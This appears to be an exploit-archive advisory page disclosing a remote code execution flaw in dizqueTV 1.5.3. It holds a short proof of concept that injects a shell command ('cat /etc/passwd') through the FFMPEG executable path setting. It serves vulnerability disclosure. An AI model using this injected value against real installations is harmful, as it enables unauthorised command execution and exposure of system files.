**dizqueTV 1.5.3 Remote Code Execution**

Posted Oct 3, 2024

Authored by Ahmed Said Saud Al-Busaidi

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution

SHA-256 | b18cb14167c97952ef1684789d6a48b83e5c1338a0677edc0b3eaef195497b45

Download | Favorite | View

**dizqueTV 1.5.3 Remote Code Execution**

    # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)# Date: 9/21/2024# Exploit Author: Ahmed Said Saud Al-Busaidi# Vendor Homepage: https://github.com/vexorian/dizquetv# Version: 1.5.3# Tested on: linuxPOC:## Vulnerability DescriptiondizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.## STEPS TO REPRODUCE1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"3. click on update4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

**File Tags**

*   ActiveX (933)
*   Advisory (87,037)
*   Arbitrary (17,123)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,049)
*   Code Execution (7,927)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,438)
*   DoS (25,312)
*   Encryption (2,395)
*   Exploit (54,379)
*   File Inclusion (4,278)
*   File Upload (1,026)
*   Firewall (822)
*   Info Disclosure (2,927)
*   Intrusion Detection (921)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,313)
*   Local (14,866)
*   Magazine (587)
*   Overflow (13,229)
*   Perl (1,435)
*   PHP (5,293)
*   Proof of Concept (2,415)
*   Protocol (3,753)
*   Python (1,664)
*   Remote (31,931)
*   Root (3,674)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,055)
*   Shell (3,310)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,739)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,135)
*   Web (10,147)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,308)
*   Other

**File Archives**

*   October 2024
*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,132)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,415)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,936)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,896)
*   UNIX (9,464)
*   UnixWare (188)
*   Windows (6,782)
*   Other

Tag

#apple